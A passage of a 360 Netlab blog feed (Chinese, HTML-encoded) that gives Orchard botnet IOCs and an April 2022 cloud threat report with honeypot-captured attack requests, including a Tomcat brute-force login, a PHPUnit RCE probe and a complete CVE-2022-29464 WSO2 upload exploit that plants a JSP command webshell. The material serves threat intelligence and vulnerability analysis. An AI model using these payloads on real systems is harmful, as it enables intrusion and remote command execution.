7684;botnet&#x5BB6;&#x65CF;&#xFF0C;&#x9884;&#x8BA1;&#x540E;&#x7EED;&#x4F1A;&#x6709;&#x66F4;&#x591A;&#x7684;&#x53D8;&#x79CD;&#x51FA;&#x73B0;&#xFF0C;&#x503C;&#x5F97;&#x6211;&#x4EEC;&#x8B66;&#x60D5;&#x3002;&#x5BF9;Orchard&#x6211;&#x4EEC;&#x4F1A;&#x6301;&#x7EED;&#x4FDD;&#x6301;&#x5173;&#x6CE8;&#xFF0C;&#x6709;&#x65B0;&#x7684;&#x53D1;&#x73B0;&#x4F1A;&#x7EE7;&#x7EED;&#x516C;&#x5F00;&#x3002;</p>
<h2 id>&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h2>
<p>&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com"><strong>twitter</strong></a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;<strong>netlab[at]360.cn</strong>&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><h2 id="iocs">IOCs</h2>
<h3 id="c2">C2</h3>
<pre><code>orcharddns.duckdns.org
orchardmaster.duckdns.org
ojena.duckdns.org
vgzero.duckdns.org
victorynicholas.duckdns.org
zamarin1.duckdns.org

45.61.185.36
45.61.186.52
45.61.187.240
205.185.124.143
45.61.185.231
</code></pre>
<h3 id="md5">MD5</h3>
<pre><code>5c883ff8539b8d04be017a51a84e3af8
f3e0b960a48b433bc4bfe6ac44183b74
9cbe4bd27eba8c70b6eddaeb6707659b
cb442cbff066dfef2e3ff0c56610148f
10D42F5465D5D8808B43619D8266BD99
f3c06399c68c5fdf80bb2853f8f2934b
19159280736dbe6c11b7d6a57f6bb7b9
b5a6f78d5575a60316f4e784371d4f8c
3c20ba851edecd28c198691321429883
2b244a39571ab27f7bb4174d460adeef
ae1e9b3621ee041be6ab5e12bff37c53
00b1620f89b7980b34d53737d9e42fd3
4d2445a43591d041cabbbf3dfca6dfbd
</code></pre>
<h3 id>&#x79C1;&#x6709;&#x77FF;&#x6C60;</h3>
<pre><code>45.61.187.7:7733
</code></pre>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[公有云网络安全威胁情报（202204）]]></title><description><![CDATA[<!--kg-card-begin: markdown--><h2 id>&#x6982;&#x8FF0;</h2>
<!--kg-card-end: markdown--><blockquote>&#x672C;&#x6587;&#x805A;&#x7126;&#x4E8E;&#x4E91;&#x4E0A;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x7684;&#x626B;&#x63CF;&#x653B;&#x51FB;&#x3001;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x603B;&#x4F53;&#x653B;&#x51FB;&#x60C5;&#x51B5;&#x5206;&#x6790;&#x3001;&#x70ED;&#x95E8;&#x6F0F;&#x6D1E;&#x53CA;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x7684;&#x653B;&#x51FB;&#x5A01;&#x80C1;&#x3002;</blockquote><!--kg-card-begin: markdown--><ul>
<li><a href="https://netlab.360.com/zh/honeypot?ref=blog.netlab.360.com">360&#x9AD8;&#x7EA7;</a></li></ul>]]></description><link>https://blog.netlab.360.com/public-cloud-threat-intelligence-202204/</link><guid isPermaLink="false">63873b9a8b1c1e0007f5301a</guid><category><![CDATA[公有云威胁情报]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><dc:creator><![CDATA[360Netlab]]></dc:creator><pubDate>Wed, 11 May 2022 02:53:55 GMT</pubDate><content:encoded><![CDATA[<!--kg-card-begin: markdown--><h2 id>&#x6982;&#x8FF0;</h2>
<!--kg-card-end: markdown--><blockquote>&#x672C;&#x6587;&#x805A;&#x7126;&#x4E8E;&#x4E91;&#x4E0A;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x7684;&#x626B;&#x63CF;&#x653B;&#x51FB;&#x3001;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x603B;&#x4F53;&#x653B;&#x51FB;&#x60C5;&#x51B5;&#x5206;&#x6790;&#x3001;&#x70ED;&#x95E8;&#x6F0F;&#x6D1E;&#x53CA;&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x7684;&#x653B;&#x51FB;&#x5A01;&#x80C1;&#x3002;</blockquote><!--kg-card-begin: markdown--><ul>
<li><a href="https://netlab.360.com/zh/honeypot?ref=blog.netlab.360.com">360&#x9AD8;&#x7EA7;&#x5A01;&#x80C1;&#x72E9;&#x730E;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;</a>&#x53D1;&#x73B0;&#x5168;&#x7403;9.2&#x4E07;&#x4E2A;&#x4E91;&#x670D;&#x52A1;&#x5668;IP&#x8FDB;&#x884C;&#x7F51;&#x7EDC;&#x626B;&#x63CF;&#x3001;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x3001;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x7B49;&#x884C;&#x4E3A;&#x3002;&#x5176;&#x4E2D;&#x5305;&#x62EC;&#x56FD;&#x5185;39&#x5BB6;&#x5355;&#x4F4D;&#x6240;&#x5C5E;&#x7684;&#x4E91;&#x670D;&#x52A1;&#x8D44;&#x4EA7;IP&#xFF0C;&#x8FD9;&#x4E9B;&#x5355;&#x4F4D;&#x6D89;&#x53CA;&#x653F;&#x5E9C;&#x3001;&#x533B;&#x7597;&#x3001;&#x5EFA;&#x7B51;&#x3001;&#x519B;&#x5DE5;&#x7B49;&#x591A;&#x4E2A;&#x884C;&#x4E1A;&#x3002;</li>
<li>2022&#x5E74;4&#x6708;&#xFF0C;WSO2&#x591A;&#x4E2A;&#x4EA7;&#x54C1;&#x548C;Apache Struts2&#x7206;&#x51FA;&#x9AD8;&#x5371;&#x6F0F;&#x6D1E;&#xFF0C;&#x4E24;&#x4E2A;&#x6F0F;&#x6D1E;&#x6280;&#x672F;&#x7EC6;&#x8282;&#x5DF2;&#x7ECF;&#x516C;&#x5F00;&#xFF0C;&#x5E76;&#x4E14;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x4E24;&#x4E2A;&#x6F0F;&#x6D1E;&#x90FD;&#x5DF2;&#x6709;&#x5728;&#x91CE;&#x5229;&#x7528;&#x548C;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x7684;&#x884C;&#x4E3A;&#x3002;</li>
<li>&#x672C;&#x6708;&#x5171;&#x8BB0;&#x5F55;&#x6765;&#x6E90;&#x4E8E;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x7684;&#x626B;&#x63CF;&#x548C;&#x653B;&#x51FB;&#x4F1A;&#x8BDD;3.7&#x4EBF;&#x6B21;&#xFF0C;&#x5176;&#x4E2D;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x4F1A;&#x8BDD;2400&#x4E07;&#x6B21;&#xFF0C;&#x4F20;&#x64AD;&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x4F1A;&#x8BDD;77.2&#x4E07;&#x6B21;&#x3002;</li>
</ul>
<h2 id>&#x4E91;&#x4E0A;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x626B;&#x63CF;&#x653B;&#x51FB;</h2>
<!--kg-card-end: markdown--><blockquote>&#x56DB;&#x6708;&#x4EFD;&#xFF0C;&#x6211;&#x4EEC;&#x5171;&#x76D1;&#x6D4B;&#x5230;&#x5168;&#x56FD;39&#x4E2A;&#x516C;&#x6709;&#x4E91;&#x91CD;&#x70B9;&#x8D44;&#x4EA7;&#x5B58;&#x5728;&#x5F02;&#x5E38;&#x626B;&#x63CF;&#x53CA;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x3002;</blockquote><!--kg-card-begin: markdown--><p>&#x968F;&#x7740;&#x4E91;&#x670D;&#x52A1;&#x7684;&#x666E;&#x53CA;&#xFF0C;&#x4E91;&#x5B89;&#x5168;&#x95EE;&#x9898;&#x4E5F;&#x968F;&#x4E4B;&#x8D8A;&#x53D1;&#x7A81;&#x51FA;&#x3002;&#x653B;&#x51FB;&#x8005;&#x5E38;&#x5E38;&#x5165;&#x4FB5;&#x4E91;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x5E76;&#x5229;&#x7528;&#x88AB;&#x5165;&#x4FB5;&#x673A;&#x5668;&#x7EE7;&#x7EED;&#x53D1;&#x52A8;&#x653B;&#x51FB;&#x3002;4&#x6708;&#x4EFD;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x4E86;&#x56FD;&#x5185;39&#x4E2A;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x91CD;&#x70B9;IP&#x5177;&#x6709;&#x5F02;&#x5E38;&#x626B;&#x63CF;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#xFF0C;&#x7531;&#x6B64;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;&#x8BE5;&#x91CD;&#x70B9;IP&#x53EF;&#x80FD;&#x88AB;&#x5165;&#x4FB5;&#x3002;&#x4ECE;&#x884C;&#x4E1A;&#x5206;&#x5E03;&#x770B;&#xFF0C;&#x4E8B;&#x4E1A;&#x5355;&#x4F4D;&#x548C;&#x653F;&#x5E9C;&#x673A;&#x5173;&#x7684;&#x4E91;&#x4E0A;&#x8D44;&#x4EA7;&#x5B89;&#x5168;&#x98CE;&#x9669;&#x95EE;&#x9898;&#x8F83;&#x5927;&#xFF0C;&#x6B64;&#x5916;&#xFF0C;&#x91D1;&#x878D;&#x4E1A;&#x548C;&#x592E;&#x4F01;&#x4E5F;&#x9762;&#x4E34;&#x8F83;&#x4E3A;&#x4E25;&#x91CD;&#x7684;&#x5B89;&#x5168;&#x5A01;&#x80C1;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220505111047574.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220505111047574.png" class="kg-image"></a></p>
<p>&#x4ECE;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x5206;&#x5E03;&#x60C5;&#x51B5;&#x6765;&#x770B;&#xFF0C;&#x963F;&#x91CC;&#x4E91;&#x5728;&#x653F;&#x4F01;&#x5E02;&#x573A;&#x5360;&#x636E;&#x4E86;&#x8F83;&#x5927;&#x7684;&#x5E02;&#x573A;&#x4EFD;&#x989D;&#xFF0C;&#x56E0;&#x6B64;&#x4E5F;&#x66F4;&#x52A0;&#x5BB9;&#x6613;&#x9762;&#x4E34;&#x5A01;&#x80C1;&#xFF0C;&#x6B64;&#x6B21;&#x51FA;&#x73B0;&#x626B;&#x63CF;&#x653B;&#x51FB;&#x7684;&#x91CD;&#x70B9;IP&#x4E91;&#x670D;&#x52A1;&#x5546;&#x4EE5;&#x963F;&#x91CC;&#x4E91;&#x4E3A;&#x4E3B;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220509171659966.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220509171659966.png" class="kg-image"></a></p>
<p>&#x8FD9;&#x4E9B;&#x91CD;&#x70B9;IP&#x4E3B;&#x8981;&#x4F7F;&#x7528;&#x4E86;&#x654F;&#x611F;&#x6587;&#x4EF6;&#x55C5;&#x63A2;&#x3001;Redis&#x7684;&#x76F8;&#x5173;&#x6F0F;&#x6D1E;&#x53CA;SSH&#x66B4;&#x529B;&#x7834;&#x89E3;&#x7B49;&#x653B;&#x51FB;&#x624B;&#x6CD5;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220509180556394.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220509180556394.png" class="kg-image"></a></p>
<p>&#x4E0B;&#x9762;&#x4ECB;&#x7ECD;&#x5176;&#x4E2D;&#x51E0;&#x4E2A;&#x5177;&#x4F53;&#x6848;&#x4F8B;&#x3002;</p>
<table>
<thead>
<tr>
<th style="text-align:center">IP&#x5730;&#x5740;</th>
<th style="text-align:center">&#x4E91;&#x670D;&#x52A1;&#x5546;</th>
<th style="text-align:center">&#x5355;&#x4F4D;&#x540D;&#x79F0;</th>
<th style="text-align:center">&#x884C;&#x4E1A;</th>
<th style="text-align:center">IP&#x6240;&#x5728;&#x7701;&#x4EFD;</th>
<th style="text-align:center">&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x5217;&#x8868;</th>
<th style="text-align:center">&#x626B;&#x63CF;&#x534F;&#x8BAE;&#x5217;&#x8868;</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">123.56.*.*</td>
<td style="text-align:center">&#x963F;&#x91CC;&#x4E91;</td>
<td style="text-align:center">***&#x4EBA;&#x6C11;&#x533B;&#x9662;</td>
<td style="text-align:center">&#x533B;&#x7597;</td>
<td style="text-align:center">&#x5317;&#x4EAC;</td>
<td style="text-align:center">Redis&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;&#x6F0F;&#x6D1E;<br>Docker API&#x7248;&#x672C;&#x4FE1;&#x606F;&#x6CC4;&#x9732;&#x6F0F;&#x6D1E;</td>
<td style="text-align:center">Redis, HTTP</td>
</tr>
<tr>
<td style="text-align:center">120.92.*.*</td>
<td style="text-align:center">&#x91D1;&#x5C71;&#x4E91;</td>
<td style="text-align:center">****&#x96C6;&#x56E2;&#x6709;&#x9650;&#x516C;&#x53F8;</td>
<td style="text-align:center">&#x5EFA;&#x7B51;/&#x5927;&#x578B;&#x592E;&#x4F01;</td>
<td style="text-align:center">&#x5317;&#x4EAC;</td>
<td style="text-align:center">Apache Tomcat&#x66B4;&#x529B;&#x7834;&#x89E3;<br>PHPUnit &#x8FDC;&#x7A0B;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x6F0F;&#x6D1E;<br>ThinkPHP &#x8FDC;&#x7A0B;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x6F0F;&#x6D1E;&#x7B49;</td>
<td style="text-align:center">HTTP</td>
</tr>
<tr>
<td style="text-align:center">121.40.*.*</td>
<td style="text-align:center">&#x963F;&#x91CC;&#x4E91;</td>
<td style="text-align:center">****&#x80A1;&#x4EFD;&#x6709;&#x9650;&#x516C;&#x53F8;</td>
<td style="text-align:center">&#x5236;&#x9020;&#x4E1A;/&#x519B;&#x5DE5;</td>
<td style="text-align:center">&#x6D59;&#x6C5F;</td>
<td style="text-align:center">MSSQL&#x66B4;&#x529B;&#x7834;&#x89E3;</td>
<td style="text-align:center">TDS</td>
</tr>
</tbody>
</table>
<p>&#x6848;&#x4F8B;1&#xFF1A;&#x4F4D;&#x4E8E;&#x5317;&#x4EAC;&#x7684;IP&#x5730;&#x5740;&#x4E3A;123.56.*.*&#x7684;&#x963F;&#x91CC;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x5C5E;&#x4E8E;&#x67D0;&#x5730;&#x4EBA;&#x6C11;&#x533B;&#x9662;&#xFF0C;&#x8FD9;&#x4E2A;IP&#x5730;&#x5740;&#x5B58;&#x5728;&#x5229;&#x7528;Redis&#x548C;Docker&#x6F0F;&#x6D1E;&#x7684;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#xFF1A;</p>
<pre><code>*1
$4
info
</code></pre>
<pre><code>GET /v1.16/version HTTP/1.1
Host: {target}
User-Agent: Mozilla/5.0 zgrab/0.x
Accept: */*
Accept-Encoding: gzip 
</code></pre>
<p>&#x6848;&#x4F8B;2&#xFF1A;&#x4F4D;&#x4E8E;&#x5317;&#x4EAC;&#x7684;IP&#x5730;&#x5740;&#x4E3A;120.92.*.*&#x7684;&#x91D1;&#x5C71;&#x4E91;&#x670D;&#x52A1;&#x5668;&#x5C5E;&#x4E8E;&#x67D0;&#x5EFA;&#x7B51;&#x884C;&#x4E1A;&#x5927;&#x578B;&#x592E;&#x4F01;&#x96C6;&#x56E2;&#x6709;&#x9650;&#x516C;&#x53F8;&#xFF0C;&#x8FD9;&#x4E2A;IP&#x5730;&#x5740;&#x6709;Apache Tomcat&#x3001;PHPUnit&#x548C;ThinkPHP&#x7B49;&#x591A;&#x4E2A;&#x4EA7;&#x54C1;&#x7684;&#x66B4;&#x529B;&#x7834;&#x89E3;&#x548C;&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x884C;&#x4E3A;&#xFF1A;</p>
<pre><code>GET /manager/html HTTP/1.1
Host: {target}:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Authorization: Basic OGhZVFNVRms6OGhZVFNVRms=
Connection: close
Accept-Encoding: gzip
Connection: close 
</code></pre>
<pre><code>POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {target}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Content-Length: 52
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

&lt;?=md5(&apos;eziqkjph&apos;);echo strtoupper(php_uname(&apos;s&apos;))?&gt;
</code></pre>
<h2 id>&#x70ED;&#x95E8;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;</h2>
<!--kg-card-end: markdown--><blockquote>2022&#x5E74;4&#x6708;12&#x65E5;&#xFF0C;Apache&#x53D1;&#x5E03;Apache Struts2 &#x9AD8;&#x5371;&#x6F0F;&#x6D1E;(CVE-2021-31805)&#xFF0C;&#x8BE5;&#x6F0F;&#x6D1E;&#x53EF;&#x5141;&#x8BB8;&#x653B;&#x51FB;&#x8005;&#x53D1;&#x8D77;&#x8FDC;&#x7A0B;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x3002;&#x653B;&#x51FB;&#x8005;&#x5DF2;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;Shellbot&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x3002;&#x540C;&#x6708;18&#x65E5;&#xFF0C;WSO2&#x516C;&#x5F00;&#x9AD8;&#x5371;&#x6F0F;&#x6D1E;CVE-2022-29464&#xFF0C;&#x8BE5;&#x6F0F;&#x6D1E;&#x5141;&#x8BB8;&#x653B;&#x51FB;&#x8005;&#x5728;WSO2&#x7684;&#x591A;&#x4E2A;&#x4EA7;&#x54C1;&#x4E0A;&#x65E0;&#x9650;&#x5236;&#x5730;&#x4E0A;&#x4F20;&#x4EFB;&#x610F;&#x6587;&#x4EF6;&#x3002;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x653B;&#x51FB;&#x8005;&#x5DF2;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;WebShell&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x3002;</blockquote><!--kg-card-begin: markdown--><h3 id="1wso2cve202229464">&#xFF08;1&#xFF09;WSO2 &#x591A;&#x4EA7;&#x54C1;&#x65E0;&#x9650;&#x5236;&#x6587;&#x4EF6;&#x4E0A;&#x4F20;&#x6F0F;&#x6D1E;(CVE-2022-29464)</h3>
<h4 id>&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;</h4>
<p><strong>&#x5F71;&#x54CD;&#x8303;&#x56F4;&#xFF1A;</strong><br>
WSO2 API Manager 2.2.0~4.0.0<br>
WSO2 Identity Server 5.2.0~5.11.0<br>
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0<br>
WSO2 Identity Server as Key Manager 5.3.0~5.11.0<br>
WSO2 Enterprise Integrator 6.2.0~6.6.0<br>
WSO2 Open Banking AM 1.4.0~2.0.0<br>
WSO2 Open Banking KM 1.4.0~2.0.0</p>
<p><strong>CVE&#x7F16;&#x53F7;&#xFF1A;</strong> CVE-2022-29464<br>
<strong>&#x62AB;&#x9732;&#x65E5;&#x671F;&#xFF1A;</strong> 2022.04.18<br>
<strong>CVSS 3.1&#x8BC4;&#x5206;&#xFF1A;</strong> 9.8<br>
<strong>&#x5F71;&#x54CD;&#x8BBE;&#x5907;&#x91CF;&#x7EA7;&#xFF1A;</strong> &#x4E07;&#x7EA7;</p>
<p>2022&#x5E74;4&#x6708;23&#x65E5;&#xFF0C;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x9996;&#x6B21;&#x6355;&#x83B7;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x8FDB;&#x884C;&#x653B;&#x51FB;&#x7684;&#x6570;&#x636E;&#x5305;&#x3002;&#x6211;&#x4EEC;&#x53D1;&#x73B0;&#x603B;&#x4F53;&#x4E0A;&#x968F;&#x65F6;&#x95F4;&#x63A8;&#x79FB;&#xFF0C;&#x5C1D;&#x8BD5;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x653B;&#x51FB;&#x8005;IP&#x6570;&#x91CF;&#x548C;&#x653B;&#x51FB;&#x4F1A;&#x8BDD;&#x6570;&#x91CF;&#x5448;&#x73B0;&#x589E;&#x52A0;&#x8D8B;&#x52BF;&#x3002;2022&#x5E74;4&#x6708;28&#x65E5;&#x5F00;&#x59CB;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x5F00;&#x59CB;&#x5229;&#x7528;&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;Webshell&#x6076;&#x610F;&#x8F6F;&#x4EF6;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220505162830059.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220505162830059.png" class="kg-image"></a></p>
<p>WSO2&#x5DF2;&#x516C;&#x5E03;&#x6F0F;&#x6D1E;&#x8BE6;&#x60C5;&#x53CA;&#x4FEE;&#x8865;&#x63AA;&#x65BD;&#xFF0C;<a href="https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738?ref=blog.netlab.360.com">&#x70B9;&#x51FB;&#x67E5;&#x770B;</a>&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x5BF9;&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x5229;&#x7528;&#x65B9;&#x6CD5;&#x8FDB;&#x884C;&#x4E86;&#x5206;&#x6790;&#xFF1A;</p>
<h4 id="payload">&#x6F0F;&#x6D1E;Payload</h4>
<pre><code>POST /fileupload/toolsAny HTTP/1.1
Host: x.x.x.x:9443
User-Agent: python-requests/2.27.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 881
Content-Type: multipart/form-data; boundary=256c5115fcd40ad6d0bf6a5ec73018cc

--256c5115fcd40ad6d0bf6a5ec73018cc
Content-Disposition: form-data; name=&quot;../../../../repository/deployment/server/webapps/authenticationendpoint/miori.jsp&quot;; filename=&quot;../../../../repository/deployment/server/webapps/authenticationendpoint/miori.jsp&quot;

&lt;FORM&gt;
    &lt;INPUT name=&apos;cmd&apos; type=text&gt;
    &lt;INPUT type=submit value=&apos;Run&apos;&gt;
&lt;/FORM&gt;
&lt;%@ page import=&quot;java.io.*&quot; %&gt;
    &lt;%
    String cmd = request.getParameter(&quot;cmd&quot;);
    String output = &quot;&quot;;
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+&quot;&lt;/br&gt;&quot;; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%&gt;
        &lt;pre&gt;&lt;%=output %&gt;&lt;/pre&gt;
--256c5115fcd40ad6d0bf6a5ec73018cc--
</code></pre>
<h4 id>&#x6F0F;&#x6D1E;&#x5206;&#x6790;</h4>
<p>&#x6F0F;&#x6D1E;&#x63A5;&#x53E3;&#x4E3A;/fileupload&#xFF0C;&#x641C;&#x7D22;&#x63A5;&#x53E3;&#x914D;&#x7F6E;&#x4FE1;&#x606F;&#xFF0C;&#x8BE5;&#x63A5;&#x53E3;&#x672A;&#x8FDB;&#x884C;&#x8BA4;&#x8BC1;&#x5904;&#x7406;&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504112812992-16517467119031.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504112812992-16517467119031.png" class="kg-image"></a><br>
&#x4ECE;url&#x7684;&#x6620;&#x5C04;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x770B;&#xFF0C;&#x6F0F;&#x6D1E;&#x63A5;&#x53E3;/fileupload/toolsAny&#x5BF9;&#x5E94;&#x7684;&#x5904;&#x7406;&#x6587;&#x4EF6;&#x662F;org.wso2.carbon.ui.transports.fileupload.ToolsAnyFileUploadExecutor&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504114744485-16517467175532.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504114744485-16517467175532.png" class="kg-image"></a><br>
&#x5728;ToolsAnyFileUploadExecutor&#x7C7B;&#x7684;execute&#x5904;&#x7406;&#x51FD;&#x6570;&#x8BBE;&#x7F6E;&#x65AD;&#x70B9;&#xFF0C;&#x53D1;&#x9001;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x6355;&#x83B7;&#x7684;payload&#x6570;&#x636E;&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504121923679-16517467261333.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504121923679-16517467261333.png" class="kg-image"></a><br>
&#x5904;&#x7406;&#x51FD;&#x6570;&#x5E76;&#x6CA1;&#x6709;&#x5BF9;&#x7528;&#x6237;&#x8F93;&#x5165;&#x7684;&#x4E0A;&#x4F20;&#x6587;&#x4EF6;&#x540D;&#x8FDB;&#x884C;&#x6821;&#x9A8C;&#x5B58;&#x5728;&#x8DEF;&#x5F84;&#x7A7F;&#x8D8A;&#x6F0F;&#x6D1E;&#xFF0C;&#x4ECE;&#x800C;&#x53EF;&#x4EE5;&#x4E0A;&#x4F20;webshell&#x5230;/webapps/&#x76EE;&#x5F55;&#xFF0C;&#x5BFC;&#x81F4;RCE&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504123925299-16517467465076.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504123925299-16517467465076.png" class="kg-image"></a></p>
<h4 id>&#x6F0F;&#x6D1E;&#x4FEE;&#x590D;</h4>
<p>&#x5728;&#x65B0;&#x7248;&#x672C;&#x4E2D;&#xFF0C;ToolsAnyFileUploadExecutor&#x7684;&#x51FD;&#x6570;execute&#x88AB;&#x5F03;&#x7528;&#xFF0C;&#x76F4;&#x63A5;&#x8FD4;&#x56DE;false&#xFF1A;<br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504123404824-16517467412775.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504123404824-16517467412775.png" class="kg-image"></a><br>
<a href="https://blog.netlab.360.com/content/images/2022/05/image-20220504123221113-16517467349364.png"><img src="https://blog.netlab.360.com/content/images/2022/05/image-20220504123221113-16517467349364.png" class="kg-image"></a></p>
<h3 id="2apachestruts2s2062cve202131805">(2) Apache Struts2 S2-062 &#x8FDC;&#x7A0B;&#x4EE3;&#x7801;&#x6267;&#x884C;&#x6F0F;&#x6D1E;(CVE-2021-31805)</h3>
<h4 id>&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;</h4>
<p><strong>&#x5F71;&#x54CD;&#x8303;&#x56F4;&#xFF1A;</strong> Apache Struts 2.0.0 - 2.5.29<br>
<strong>CVE&#x7F16;&#x53F7;&#xFF1A;</strong> CVE-2021-31805<br>
<strong>&#x516C;&#x5F00;&#x65E5;&#x671F;&#xFF1A;</strong> 2022.04.12<br>
<strong>CVSS 3.1&#x8BC4;&#x5206;&#xFF1A;</strong> 9.8<br>
<strong>&#x5F71;&#x54CD;&#x8BBE;&#x5907;&#x91CF;&#x7EA7;&#xFF1A;</strong> &#x767E;&#x4E07;&#x7EA7;</p>
<p>&#x8FD9;&#x4E2A;&#x6F0F;&#x6D1E;&#x7684;CVE&#x53F7;&#x5E74;&#x4EFD;&#x867D;&#x7136;&#x662F;2021&#x5E74;&#xFF0C;&#x4F46;2022&#x5E74;4&#x6708;&#x624D;&#x5BF9;&#x5916;&#x516C;&#x5F00;&#x3002;&#x871C;&#x7F50;&#x7CFB;&#x7EDF;&#x6700;&#x65E9;&#x5728;2022&#x5E74;4&#x6708;15&#x65E5;&#x6355;&#x83B7;&#x5230;&#x653B;&#x51FB;&#x8005;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x53D1;&#x8D77;&#x7684;&#x653B;&#x51FB;&#xFF0C;4&#x6708;16&#x65E5;&#x53D1;&#x73B0;Shellbot&#x6076;&#x610F;&#x7A0B;&#x5E8F;&#x5F00;&#x59CB;&#x5229;&#x7528;&#x8BE5;&#x6F0F;&#x6D1E;&#x4F20;&#x64AD;&#x3002;</p>
<h4 id>&#x6F0F;&#x6D1E;&#x5206;&#x6790;</h4>
